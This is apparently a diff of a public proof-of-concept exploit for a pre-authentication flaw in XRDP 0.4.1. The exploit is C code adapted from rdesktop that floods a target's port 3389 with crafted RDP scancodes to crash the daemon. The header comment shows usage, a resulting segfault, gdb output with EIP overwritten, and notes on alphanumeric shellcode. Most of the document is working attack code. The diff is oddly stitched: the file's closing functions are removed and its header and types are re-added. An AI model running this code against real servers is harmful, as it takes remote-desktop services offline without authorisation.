Microsoft key that we just got? */ - /* Care factor: zero! */ - break; - } - - s->p = next_tag; - } - - return s_check_end(s); -} - -/* Process crypto information blob */ -static void -sec_process_crypt_info(STREAM s) -{ - uint8 *server_random, *modulus, *exponent; - uint8 client_random[SEC_RANDOM_SIZE]; - uint32 rc4_key_size; - - if (!sec_parse_crypt_info(s, &rc4_key_size, &server_random, &modulus, &exponent)) - return; - - /* Generate a client random, and hence determine encryption keys */ - sec_rsa_encrypt(sec_crypted_random, client_random, SEC_RANDOM_SIZE, modulus, exponent); - sec_generate_keys(client_random, server_random, rc4_key_size); -} - -/* Process connect response data blob */ -static void -sec_process_mcs_data(STREAM s) -{ - uint16 tag, length; - uint8 *next_tag; - uint8 len; - - in_uint8s(s, 21); /* header */ - in_uint8(s, len); - if (len & 0x80) - in_uint8(s, len); - - while (s->p < s->end) - { - in_uint16_le(s, tag); - in_uint16_le(s, length); - - if (length <= 4) - return; - - next_tag = s->p + length - 4; - - switch (tag) - { - case SEC_TAG_SRV_INFO: - case SEC_TAG_SRV_3: - break; - - case SEC_TAG_SRV_CRYPT: - sec_process_crypt_info(s); - break; - } - - s->p = next_tag; - } -} - -/* Receive secure transport packet */ -STREAM -sec_recv(void) -{ - uint32 sec_flags; - STREAM s; - - while ((s = mcs_recv()) != NULL) - { - if (encryption || !licence_issued) - { - in_uint32_le(s, sec_flags); - - if (sec_flags & SEC_LICENCE_NEG) - { - licence_process(s); - continue; - } - - if (sec_flags & SEC_ENCRYPT) - { - in_uint8s(s, 8); /* signature */ - - } - } - - return s; - } - - return NULL; -} - -/* Establish a secure connection */ -BOOL -sec_connect(char *server) -{ - struct stream mcs_data; - - /* We exchange some RDP data during the MCS-Connect */ - mcs_data.size = 512; - mcs_data.p = mcs_data.data = xmalloc(mcs_data.size); - sec_out_mcs_data(&mcs_data); - - if (!mcs_connect(server, &mcs_data)) - return False; - - sec_process_mcs_data(&mcs_data); - - 
xfree(mcs_data.data); - return True; -} - -/* Disconnect a connection */ -void -sec_disconnect(void) -{ - mcs_disconnect(); -} - - -/* Initialise TCP transport data packet */ -STREAM -tcp_init(int maxlen) -{ - if (maxlen > out.size) - { - out.size = maxlen; - } - - out.p = out.data; - out.end = out.data + out.size; - return &out; -} - -/* Send TCP transport data packet */ -void -tcp_send(STREAM s) -{ - int length = s->end - s->data; - int sent, total = 0; - - while (total < length) - { - sent = send(sock, s->data + total, length - total, 0); - if (sent <= 0) - { - fprintf(stderr, "\n[=] Check port 3389 on target host. It should be offline.\n\n"); - return; - } - - total += sent; - } -} - -/* Receive a message on the TCP layer */ -STREAM -tcp_recv(int length) -{ - int rcvd = 0; - - if (length > in.size) - { - - in.size = length; - } - - in.end = in.p = in.data; - - while (length > 0) - { - if (!ui_select(sock)) - /* User quit */ - return NULL; - - rcvd = recv(sock, in.end, length, 0); - if (rcvd == -1) - { - error("recv: %s", strerror(errno)); - return NULL; - } - - in.end += rcvd; - length -= rcvd; - } - - return ∈ -} - -/* Establish a connection on the TCP layer */ -BOOL -tcp_connect(char *server) -{ - struct hostent *nslookup; - struct sockaddr_in servaddr; - int true = 1; - - if ((nslookup = gethostbyname(server)) != NULL) - { - memcpy(&servaddr.sin_addr, nslookup->h_addr, sizeof(servaddr.sin_addr)); - } - else if ((servaddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) - { - error("%s: unable to resolve host\n", server); - return False; - } - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) - { - error("socket: %s\n", strerror(errno)); - return False; - } - - servaddr.sin_family = AF_INET; - servaddr.sin_port = htons(tcp_port_rdp); - - if (connect(sock, (struct sockaddr *) &servaddr, sizeof(struct sockaddr)) < 0) - { - error("connect: %s\n", strerror(errno)); - close(sock); - return False; - } - - setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *) 
&true, sizeof(true)); - - in.size = 4096; - in.data = xmalloc(in.size); - - out.size = 4096; - out.data = xmalloc(out.size); - - return True; -} - -/* Disconnect on the TCP layer */ -void -tcp_disconnect(void) -{ - fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); - close(sock); -} - - - -/* Returns 0 after user quit, 1 otherwise */ -int -ui_select(int rdp_socket) -{ - int n = (rdp_socket > x_socket) ? rdp_socket + 1 : x_socket + 1; - fd_set rfds; - - - -// Begin PoC mods - XEvent xevent; - KeySym keysym; - uint32 ev_time; - key_translation tr; - if (ix-- >= 0) - { return 1; } - ev_time = time(NULL); - handle_special_keys(keysym, xevent.xkey.state, ev_time, True); - tr = xkeymap_translate_key(keysym, xevent.xkey.keycode, xevent.xkey.state); - ensure_remote_modifiers(ev_time, tr); - rdp_send_scancode(ev_time, RDP_KEYPRESS, tr.scancode); -// End PoC mods - - - - FD_ZERO(&rfds); - while (True) - { - /* Process any events already waiting */ - -// if (!xwin_process_events()) -// /* User quit */ -// return 0; - - FD_ZERO(&rfds); - FD_SET(rdp_socket, &rfds); - FD_SET(x_socket, &rfds); - - switch (select(n, &rfds, NULL, NULL, NULL)) - { - case -1: - error("select: %s\n", strerror(errno)); - - case 0: - continue; - } - - if (FD_ISSET(rdp_socket, &rfds)) - return 1; - } -} - - -key_translation -xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state) -{ - key_translation tr = { 0, 0 }; - - tr = keymap[keysym & KEYMAP_MASK]; - - if (tr.modifiers & MapInhibitMask) - { - - tr.scancode = 0; - return tr; - } - - if (tr.modifiers & MapLocalStateMask) - { - /* The modifiers to send for this key should be obtained - from the local state. Currently, only shift is implemented. 
*/ - if (state & ShiftMask) - { - tr.modifiers = MapLeftShiftMask; - } - } - - if (tr.scancode != 0) - { - return tr; - } - - if (keymap_loaded) - - - /* not in keymap, try to interpret the raw scancode */ - if ((keycode >= min_keycode) && (keycode <= 0x60)) - { - tr.scancode = keycode - min_keycode; - - /* The modifiers to send for this key should be - obtained from the local state. Currently, only - shift is implemented. */ - if (state & ShiftMask) - { - tr.modifiers = MapLeftShiftMask; - } - - - } - else - { - - } - - return tr; -} - - -static void -update_modifier_state(uint8 scancode, BOOL pressed) -{ -#ifdef WITH_DEBUG_KBD - uint16 old_modifier_state; - - old_modifier_state = remote_modifier_state; -#endif - - switch (scancode) - { - case SCANCODE_CHAR_LSHIFT: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftShiftMask, pressed); - break; - case SCANCODE_CHAR_RSHIFT: - MASK_CHANGE_BIT(remote_modifier_state, MapRightShiftMask, pressed); - break; - case SCANCODE_CHAR_LCTRL: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftCtrlMask, pressed); - break; - case SCANCODE_CHAR_RCTRL: - MASK_CHANGE_BIT(remote_modifier_state, MapRightCtrlMask, pressed); - break; - case SCANCODE_CHAR_LALT: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftAltMask, pressed); - break; - case SCANCODE_CHAR_RALT: - MASK_CHANGE_BIT(remote_modifier_state, MapRightAltMask, pressed); - break; - case SCANCODE_CHAR_LWIN: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftWinMask, pressed); - break; - case SCANCODE_CHAR_RWIN: - MASK_CHANGE_BIT(remote_modifier_state, MapRightWinMask, pressed); - break; - case SCANCODE_CHAR_NUMLOCK: - /* KeyReleases for NumLocks are sent immediately. 
Toggle the - modifier state only on Keypress */ - if (pressed) - { - BOOL newNumLockState; - newNumLockState = - (MASK_HAS_BITS - (remote_modifier_state, MapNumLockMask) == False); - MASK_CHANGE_BIT(remote_modifier_state, - MapNumLockMask, newNumLockState); - } - break; - } - -#ifdef WITH_DEBUG_KBD - if (old_modifier_state != remote_modifier_state) - { - - old_modifier_state, pressed)); - - } -#endif - -} - - -/* free */ -void -xfree(void *mem) -{ - free(mem); -} - -/* report an error */ -void -error(char *format, ...) -{ - va_list ap; - - fprintf(stderr, "[=] Error: "); - - va_start(ap, format); - vfprintf(stderr, format, ap); - va_end(ap); -} - - - -/* malloc; exit if out of memory */ -void * -xmalloc(int size) -{ - void *mem = malloc(size); - if (mem == NULL) - { - error("xmalloc %d\n", size); - exit(1); - } - return mem; -} - -// milw0rm.com [2009-04-17] +/* + + XRDP <= 0.4.1 pre-auth remote PoC exploit. (xrdp.sourceforge.net) + +******************************************************************************** + + 01:59:56 root@crateria:~/xrdp# gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc + 02:00:29 root@crateria:~/xrdp# ./xrdp-poc 10.0.0.13 + + [=] Connected to 10.0.0.13 + [=] Hit CTRL-C if the progress bar stops. + + Be patient! It takes about a minute, the RDP packets + need to be sent spaced apart or the daemon discards them. + + [=] Progress: ******************************************************* + [=] Check port 3389 on target host. It should be offline. + + ~/~ + + [root@norfair xrdp]# cat /etc/issue + CentOS release 4.7 (Final) + [root@norfair xrdp]# ./xrdp -nodaemon + Segmentation fault (core dumped) + +******************************************************************************** + + Quick description of the exploit: + + This is a PoC remote exploit for the XRDP vulnerability found by Hamid Ebadi. + XRDP 0.4.1 is the latest version at the time of this writing. 
This is *almost* + a really cool exploit, but execution control is difficult to achieve because: + + 1 - The XRDP daemon only accepts valid rdp scancodes as input. (ie, not ASCII + codes, but rdp scancodes that are later translated to ASCII after validation). + This isn't a huge problem. I was able write alpha-numeric shellcode onto the + stack. However, I wasn't able to find any alpha-numeric return addresses we + can use to overwrite the saved EIP, at least on the distros I examined + (Ubuntu 8.10 and CentOS 4.7). There may be distros where this isn't the case. + + 2 - On systems with gcc versions greater than 3.4 (realistically most Linux + boxes today, Ubuntu 8.10 uses 4.3.2), gcc's -O2 option (which xrdp's + Makefile includes) enables _FORTIFY_SOURCE checks, which stop you cold. On + older distros like CentOS 4.7 (gcc 3.4.6), we can successfully overwrite EIP: + + #7 0x61616161 in ?? () + #8 0x61616161 in ?? () + #9 0xb7f59200 in ?? () + #10 0x0804db1e in xrdp_bitmap_def_proc (self=Cannot access memory + at address 0x61616169) at xrdp_bitmap.c:1482 + Previous frame inner to this frame (corrupt stack?) + + #0 0x61616161 in ?? () + (gdb) i r + eax 0x0 0 + ecx 0x8fda860 150841440 + edx 0x97d858 9951320 + ebx 0x61616161 1633771873 + esp 0xb7f59208 0xb7f59208 + ebp 0x61616161 0x61616161 + esi 0x61616161 1633771873 + edi 0x61616161 1633771873 + eip 0x61616161 0x61616161 + + But due to the alpha-numeric requirements for the return address, again, + no dice. Most of the code itself was taken from rdesktop, by Matthew Chapman. + Basically we hack rdesktop to bypass all X-windows interaction, then in + rdp_send_scancode(), we are able to build our payload. If you manage to find + an alternate way to control EIP, drop me a line. + joewalko@gmail.com + +******************************************************************************** +*/ + +#include /* inet_addr */ +#include +#include +#include /* errno */ +#include /* save licence uses it. 
*/ +#include /* open */ +#include +#include /* gethostbyname */ +#include /* sockaddr_in */ +#include /* TCP_NODELAY */ +#include +#include +#include +#include +#include /* getpwuid */ +#include /* va_list va_start va_end */ +#include +#include +#include +#include /* socket connect */ +#include /* socket connect setsockopt */ +#include /* stat */ +#include /* gettimeofday */ +#include /* timeval */ +#include /* times */ +#include /* sockaddr_un */ +#include /* tcgetattr tcsetattr */ +#include +#include /* read close getuid getgid getpid getppid gethostname */ +#include /* select read write close */ +#include +#include +#include + + +//Begin typedefs and structs +typedef int BOOL; +#ifndef True +#define True (1) +#define False (0) +#endif +typedef unsigned char uint8; +typedef signed char sint8; +typedef unsigned short uint16; +typedef signed short sint16; +typedef unsigned int uint32; +typedef signed int sint32; +typedef void *HBITMAP; +typedef void *HGLYPH; +typedef void *HCOLOURMAP; +typedef void *HCURSOR; + +typedef struct _COLOURENTRY +{ + uint8 red; + uint8 green; + uint8 blue; + +} +COLOURENTRY; + +typedef struct _COLOURMAP +{ + uint16 ncolours; + COLOURENTRY *colours; + +} +COLOURMAP; + +typedef struct _BOUNDS +{ + uint16 left; + uint16 top; + uint16 right; + uint16 bottom; + +} +BOUNDS; + +typedef struct _PEN +{ + uint8 style; + uint8 width; + uint8 colour; + +} +PEN; + +typedef struct _BRUSH +{ + uint8 xorigin; + uint8 yorigin; + uint8 style; + uint8 pattern[8]; + +} +BRUSH; + +typedef struct _FONTGLYPH +{ + sint16 offset; + sint16 baseline; + uint16 width; + uint16 height; + HBITMAP pixmap; + +} +FONTGLYPH; + +typedef struct _DATABLOB +{ + void *data; + int size; + +} +DATABLOB; + +typedef struct _key_translation +{ + uint8 scancode; + uint16 modifiers; +} +key_translation; + +/* TCP port for Remote Desktop Protocol */ +#define TCP_PORT_RDP 3389 + +/* ISO PDU codes */ +enum ISO_PDU_CODE +{ + ISO_PDU_CR = 0xE0, /* Connection Request */ + ISO_PDU_CC = 0xD0, 
/* Connection Confirm */ + ISO_PDU_DR = 0x80, /* Disconnect Request */ + ISO_PDU_DT = 0xF0, /* Data */ + ISO_PDU_ER = 0x70 /* Error */ +}; + +/* MCS PDU codes */ +enum MCS_PDU_TYPE +{ + MCS_EDRQ = 1, /* Erect Domain Request */ + MCS_DPUM = 8, /* Disconnect Provider Ultimatum */ + MCS_AURQ = 10, /* Attach User Request */ + MCS_AUCF = 11, /* Attach User Confirm */ + MCS_CJRQ = 14, /* Channel Join Request */ + MCS_CJCF = 15, /* Channel Join Confirm */ + MCS_SDRQ = 25, /* Send Data Request */ + MCS_SDIN = 26 /* Send Data Indication */ +}; + +#define MCS_CONNECT_INITIAL 0x7f65 +#define MCS_CONNECT_RESPONSE 0x7f66 +#define BER_TAG_BOOLEAN 1 +#define BER_TAG_INTEGER 2 +#define BER_TAG_OCTET_STRING 4 +#define BER_TAG_RESULT 10 +#define MCS_TAG_DOMAIN_PARAMS 0x30 +#define MCS_GLOBAL_CHANNEL 1003 + +/* RDP secure transport constants */ +#define SEC_RANDOM_SIZE 32 +#define SEC_MODULUS_SIZE 64 +#define SEC_PADDING_SIZE 8 +#define SEC_EXPONENT_SIZE 4 +#define SEC_CLIENT_RANDOM 0x0001 +#define SEC_ENCRYPT 0x0008 +#define SEC_LOGON_INFO 0x0040 +#define SEC_LICENCE_NEG 0x0080 +#define SEC_TAG_SRV_INFO 0x0c01 +#define SEC_TAG_SRV_CRYPT 0x0c02 +#define SEC_TAG_SRV_3 0x0c03 +#define SEC_TAG_CLI_INFO 0xc001 +#define SEC_TAG_CLI_CRYPT 0xc002 +#define SEC_TAG_PUBKEY 0x0006 +#define SEC_TAG_KEYSIG 0x0008 +#define SEC_RSA_MAGIC 0x31415352 /* RSA1 */ + +/* RDP licensing constants */ +#define LICENCE_TOKEN_SIZE 10 +#define LICENCE_HWID_SIZE 20 +#define LICENCE_SIGNATURE_SIZE 16 +#define LICENCE_TAG_DEMAND 0x0201 +#define LICENCE_TAG_AUTHREQ 0x0202 +#define LICENCE_TAG_ISSUE 0x0203 +#define LICENCE_TAG_REISSUE 0x0204 +#define LICENCE_TAG_PRESENT 0x0212 +#define LICENCE_TAG_REQUEST 0x0213 +#define LICENCE_TAG_AUTHRESP 0x0215 +#define LICENCE_TAG_RESULT 0x02ff +#define LICENCE_TAG_USER 0x000f +#define LICENCE_TAG_HOST 0x0010 + +/* RDP PDU codes */ +enum RDP_PDU_TYPE +{ + RDP_PDU_DEMAND_ACTIVE = 1, + RDP_PDU_CONFIRM_ACTIVE = 3, + RDP_PDU_DEACTIVATE = 6, + RDP_PDU_DATA = 7 +}; + +enum 
RDP_DATA_PDU_TYPE +{ + RDP_DATA_PDU_UPDATE = 2, + RDP_DATA_PDU_CONTROL = 20, + RDP_DATA_PDU_POINTER = 27, + RDP_DATA_PDU_INPUT = 28, + RDP_DATA_PDU_SYNCHRONISE = 31, + RDP_DATA_PDU_BELL = 34, + RDP_DATA_PDU_LOGON = 38, + RDP_DATA_PDU_FONT2 = 39 +}; + +enum RDP_CONTROL_PDU_TYPE +{ + RDP_CTL_REQUEST_CONTROL = 1, + RDP_CTL_GRANT_CONTROL = 2, + RDP_CTL_DETACH = 3, + RDP_CTL_COOPERATE = 4 +}; + +enum RDP_UPDATE_PDU_TYPE +{ + RDP_UPDATE_ORDERS = 0, + RDP_UPDATE_BITMAP = 1, + RDP_UPDATE_PALETTE = 2, + RDP_UPDATE_SYNCHRONIZE = 3 +}; + +enum RDP_POINTER_PDU_TYPE +{ + RDP_POINTER_MOVE = 3, + RDP_POINTER_COLOR = 6, + RDP_POINTER_CACHED = 7 +}; + +enum RDP_INPUT_DEVICE +{ + RDP_INPUT_SYNCHRONIZE = 0, + RDP_INPUT_CODEPOINT = 1, + RDP_INPUT_VIRTKEY = 2, + RDP_INPUT_SCANCODE = 4, + RDP_INPUT_MOUSE = 0x8001 +}; + +/* Device flags */ +#define KBD_FLAG_RIGHT 0x0001 +#define KBD_FLAG_EXT 0x0100 +#define KBD_FLAG_QUIET 0x1000 +#define KBD_FLAG_DOWN 0x4000 +#define KBD_FLAG_UP 0x8000 + +/* These are for synchronization; not for keystrokes */ +#define KBD_FLAG_SCROLL 0x0001 +#define KBD_FLAG_NUMLOCK 0x0002 +#define KBD_FLAG_CAPITAL 0x0004 + +/* See T.128 */ +#define RDP_KEYPRESS 0 +#define RDP_KEYRELEASE (KBD_FLAG_DOWN | KBD_FLAG_UP) +#define MOUSE_FLAG_MOVE 0x0800 +#define MOUSE_FLAG_BUTTON1 0x1000 +#define MOUSE_FLAG_BUTTON2 0x2000 +#define MOUSE_FLAG_BUTTON3 0x4000 +#define MOUSE_FLAG_BUTTON4 0x0280 +#define MOUSE_FLAG_BUTTON5 0x0380 +#define MOUSE_FLAG_DOWN 0x8000 + +/* Raster operation masks */ +#define ROP2_S(rop3) (rop3 & 0xf) +#define ROP2_P(rop3) ((rop3 & 0x3) | ((rop3 & 0x30) >> 2)) +#define ROP2_COPY 0xc +#define ROP2_XOR 0x6 +#define ROP2_AND 0x8 +#define ROP2_NXOR 0x9 +#define ROP2_OR 0xe +#define MIX_TRANSPARENT 0 +#define MIX_OPAQUE 1 +#define TEXT2_VERTICAL 0x04 +#define TEXT2_IMPLICIT_X 0x20 + +/* RDP capabilities */ +#define RDP_CAPSET_GENERAL 1 +#define RDP_CAPLEN_GENERAL 0x18 +#define OS_MAJOR_TYPE_UNIX 4 +#define OS_MINOR_TYPE_XSERVER 7 +#define RDP_CAPSET_BITMAP 2 
+#define RDP_CAPLEN_BITMAP 0x1C +#define RDP_CAPSET_ORDER 3 +#define RDP_CAPLEN_ORDER 0x58 +#define ORDER_CAP_NEGOTIATE 2 +#define ORDER_CAP_NOSUPPORT 4 +#define RDP_CAPSET_BMPCACHE 4 +#define RDP_CAPLEN_BMPCACHE 0x28 +#define RDP_CAPSET_CONTROL 5 +#define RDP_CAPLEN_CONTROL 0x0C +#define RDP_CAPSET_ACTIVATE 7 +#define RDP_CAPLEN_ACTIVATE 0x0C +#define RDP_CAPSET_POINTER 8 +#define RDP_CAPLEN_POINTER 0x08 +#define RDP_CAPSET_SHARE 9 +#define RDP_CAPLEN_SHARE 0x08 +#define RDP_CAPSET_COLCACHE 10 +#define RDP_CAPLEN_COLCACHE 0x08 +#define RDP_CAPSET_UNKNOWN 13 +#define RDP_CAPLEN_UNKNOWN 0x9C +#define RDP_SOURCE "MSTSC" + +/* Logon flags */ +#define RDP_LOGON_NORMAL 0x33 +#define RDP_LOGON_AUTO 0x8 + +/* Keymap flags */ +#define MapRightShiftMask (1<<0) +#define MapLeftShiftMask (1<<1) +#define MapShiftMask (MapRightShiftMask | MapLeftShiftMask) +#define MapRightAltMask (1<<2) +#define MapLeftAltMask (1<<3) +#define MapAltGrMask MapRightAltMask +#define MapRightCtrlMask (1<<4) +#define MapLeftCtrlMask (1<<5) +#define MapCtrlMask (MapRightCtrlMask | MapLeftCtrlMask) +#define MapRightWinMask (1<<6) +#define MapLeftWinMask (1<<7) +#define MapWinMask (MapRightWinMask | MapLeftWinMask) +#define MapNumLockMask (1<<8) +#define MapCapsLockMask (1<<9) +#define MapLocalStateMask (1<<10) +#define MapInhibitMask (1<<11) +#define MASK_ADD_BITS(var, mask) (var |= mask) +#define MASK_REMOVE_BITS(var, mask) (var &= ~mask) +#define MASK_HAS_BITS(var, mask) ((var & mask)>0) +#define MASK_CHANGE_BIT(var, mask, active) (var = ((var & ~mask) | (active ? 
mask : 0))) + +/* Parser state */ +typedef struct stream +{ + unsigned char *p; + unsigned char *end; + unsigned char *data; + unsigned int size; + + /* Offsets of various headers */ + unsigned char *iso_hdr; + unsigned char *mcs_hdr; + unsigned char *sec_hdr; + unsigned char *rdp_hdr; + +} + *STREAM; + +#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } +#define s_pop_layer(s,h) (s)->p = (s)->h; +#define s_mark_end(s) (s)->end = (s)->p; +#define s_check(s) ((s)->p <= (s)->end) +#define s_check_rem(s,n) ((s)->p + n <= (s)->end) +#define s_check_end(s) ((s)->p == (s)->end) +#if defined(L_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_le(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_le(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_le(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_le(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } +#else +#define in_uint16_le(s,v) { v = *((s)->p++); v += *((s)->p++) << 8; } +#define in_uint32_le(s,v) { in_uint16_le(s,v) \ + v += *((s)->p++) << 16; v += *((s)->p++) << 24; } +#define out_uint16_le(s,v) { *((s)->p++) = (v) & 0xff; *((s)->p++) = ((v) >> 8) & 0xff; } +#define out_uint32_le(s,v) { out_uint16_le(s, (v) & 0xffff); out_uint16_le(s, ((v) >> 16) & 0xffff); } +#endif +#if defined(B_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_be(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_be(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_be(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_be(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } +#define B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_be(s,v) +#define in_uint32(s,v) in_uint32_be(s,v) +#define out_uint16(s,v) out_uint16_be(s,v) +#define out_uint32(s,v) out_uint32_be(s,v) +#else +#define next_be(s,v) v = ((v) << 8) + *((s)->p++); +#define in_uint16_be(s,v) { v = *((s)->p++); next_be(s,v); } +#define in_uint32_be(s,v) { in_uint16_be(s,v); 
next_be(s,v); next_be(s,v); } +#define out_uint16_be(s,v) { *((s)->p++) = ((v) >> 8) & 0xff; *((s)->p++) = (v) & 0xff; } +#define out_uint32_be(s,v) { out_uint16_be(s, ((v) >> 16) & 0xffff); out_uint16_be(s, (v) & 0xffff); } +#endif +#ifndef B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_le(s,v) +#define in_uint32(s,v) in_uint32_le(s,v) +#define out_uint16(s,v) out_uint16_le(s,v) +#define out_uint32(s,v) out_uint32_le(s,v) +#endif +#define in_uint8(s,v) v = *((s)->p++); +#define in_uint8p(s,v,n) { v = (s)->p; (s)->p += n; } +#define in_uint8a(s,v,n) { memcpy(v,(s)->p,n); (s)->p += n; } +#define in_uint8s(s,n) (s)->p += n; +#define out_uint8(s,v) *((s)->p++) = v; +#define out_uint8p(s,v,n) { memcpy((s)->p,v,n); (s)->p += n; } +#define out_uint8a(s,v,n) out_uint8p(s,v,n); +#define out_uint8s(s,n) { memset((s)->p,0,n); (s)->p += n; } +#define SCANCODE_EXTENDED 0x80 +#define SCANCODE_KEY_44 0x2a +#define SCANCODE_CHAR_LSHIFT SCANCODE_KEY_44 +#define SCANCODE_KEY_57 0x36 +#define SCANCODE_CHAR_RSHIFT SCANCODE_KEY_57 +#define SCANCODE_KEY_58 0x1d +#define SCANCODE_CHAR_LCTRL SCANCODE_KEY_58 +#define SCANCODE_KEY_60 0x38 +#define SCANCODE_CHAR_LALT SCANCODE_KEY_60 +#define SCANCODE_KEY_62 (SCANCODE_EXTENDED | 0x38) +#define SCANCODE_CHAR_RALT SCANCODE_KEY_62 +#define SCANCODE_KEY_64 (SCANCODE_EXTENDED | 0x1d) +#define SCANCODE_CHAR_RCTRL SCANCODE_KEY_64 +#define SCANCODE_KEY_90 0x45 +#define SCANCODE_CHAR_NUMLOCK SCANCODE_KEY_90 +#define SCANCODE_KEY_110 0x1 +#define SCANCODE_CHAR_ESC SCANCODE_KEY_110 +#define SCANCODE_CHAR_LWIN (SCANCODE_EXTENDED | 0x5b) +#define SCANCODE_CHAR_RWIN (SCANCODE_EXTENDED | 0x5c) +#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } +#define s_pop_layer(s,h) (s)->p = (s)->h; +#define s_mark_end(s) (s)->end = (s)->p; +#define s_check(s) ((s)->p <= (s)->end) +#define s_check_rem(s,n) ((s)->p + n <= (s)->end) +#define s_check_end(s) ((s)->p == (s)->end) +#define RDP_ORDER_STANDARD 0x01 +#define RDP_ORDER_SECONDARY 0x02 +#define 
RDP_ORDER_BOUNDS 0x04 +#define RDP_ORDER_CHANGE 0x08 +#define RDP_ORDER_DELTA 0x10 +#define RDP_ORDER_LASTBOUNDS 0x20 +#define RDP_ORDER_SMALL 0x40 +#define RDP_ORDER_TINY 0x80 +#define MAX_TEXT 256 +#define MAX_DATA 256 + +enum RDP_ORDER_TYPE +{ + RDP_ORDER_DESTBLT = 0, + RDP_ORDER_PATBLT = 1, + RDP_ORDER_SCREENBLT = 2, + RDP_ORDER_LINE = 9, + RDP_ORDER_RECT = 10, + RDP_ORDER_DESKSAVE = 11, + RDP_ORDER_MEMBLT = 13, + RDP_ORDER_TRIBLT = 14, + RDP_ORDER_POLYLINE = 22, + RDP_ORDER_TEXT2 = 27 +}; + +typedef struct _POLYLINE_ORDER +{ + uint16 x; + uint16 y; + uint8 opcode; + uint8 fgcolour; + uint8 lines; + uint8 datasize; + uint8 data[MAX_DATA]; + +} +POLYLINE_ORDER; + +typedef struct _DESTBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + +} +DESTBLT_ORDER; + +typedef struct _PATBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint8 bgcolour; + uint8 fgcolour; + BRUSH brush; + +} +PATBLT_ORDER; + +typedef struct _SCREENBLT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + +} +SCREENBLT_ORDER; + +typedef struct _LINE_ORDER +{ + uint16 mixmode; + uint16 startx; + uint16 starty; + uint16 endx; + uint16 endy; + uint8 bgcolour; + uint8 opcode; + PEN pen; + +} +LINE_ORDER; + +typedef struct _RECT_ORDER +{ + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 colour; + +} +RECT_ORDER; + +typedef struct _DESKSAVE_ORDER +{ + uint32 offset; + uint16 left; + uint16 top; + uint16 right; + uint16 bottom; + uint8 action; + +} +DESKSAVE_ORDER; + +typedef struct _MEMBLT_ORDER +{ + uint8 colour_table; + uint8 cache_id; + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + uint16 cache_idx; + +} +MEMBLT_ORDER; + + +typedef struct _TRIBLT_ORDER +{ + uint8 colour_table; + uint8 cache_id; + uint16 x; + uint16 y; + uint16 cx; + uint16 cy; + uint8 opcode; + uint16 srcx; + uint16 srcy; + uint8 bgcolour; + uint8 fgcolour; + 
BRUSH brush; + uint16 cache_idx; + uint16 unknown; + +} +TRIBLT_ORDER; + +typedef struct _TEXT2_ORDER +{ + uint8 font; + uint8 flags; + uint8 mixmode; + uint8 unknown; + uint8 fgcolour; + uint8 bgcolour; + uint16 clipleft; + uint16 cliptop; + uint16 clipright; + uint16 clipbottom; + uint16 boxleft; + uint16 boxtop; + uint16 boxright; + uint16 boxbottom; + uint16 x; + uint16 y; + uint8 length; + uint8 text[MAX_TEXT]; + +} +TEXT2_ORDER; + +typedef struct _RDP_ORDER_STATE +{ + uint8 order_type; + BOUNDS bounds; + + DESTBLT_ORDER destblt; + PATBLT_ORDER patblt; + SCREENBLT_ORDER screenblt; + LINE_ORDER line; + RECT_ORDER rect; + DESKSAVE_ORDER desksave; + MEMBLT_ORDER memblt; + TRIBLT_ORDER triblt; + POLYLINE_ORDER polyline; + TEXT2_ORDER text2; + +} +RDP_ORDER_STATE; +//End typedefs and structs + + +// Begin XRDP global variables +//mcs.c +uint16 mcs_userid; + +//xkeymap.c +#define KEYMAP_SIZE 0xffff+1 +#define KEYMAP_MASK 0xffff +#define KEYMAP_MAX_LINE_LENGTH 80 +extern Display *display; +extern BOOL enable_compose; +static BOOL keymap_loaded; +static key_translation keymap[KEYMAP_SIZE]; +static int min_keycode; +static uint16 remote_modifier_state = 0; +static void update_modifier_state(uint8 scancode, BOOL pressed); + +//license.c +static uint8 licence_key[16]; +static uint8 licence_sign_key[16]; +BOOL licence_issued = False; + +//rdp.c +extern uint16 mcs_userid; +extern BOOL bitmap_compression; +extern BOOL orders; +extern BOOL encryption; +extern BOOL desktop_save; +uint8 *next_packet; +uint32 rdp_shareid; + +//orders.c +extern uint8 *next_packet; +static RDP_ORDER_STATE order_state; + +//secure.c +extern int width; +extern int height; +extern BOOL encryption; +extern BOOL licence_issued; +static int rc4_key_len; +static RC4_KEY rc4_decrypt_key; +static RC4_KEY rc4_encrypt_key; +static uint8 sec_sign_key[16]; +static uint8 sec_decrypt_key[16]; +static uint8 sec_encrypt_key[16]; +static uint8 sec_decrypt_update_key[16]; +static uint8 sec_encrypt_update_key[16]; 
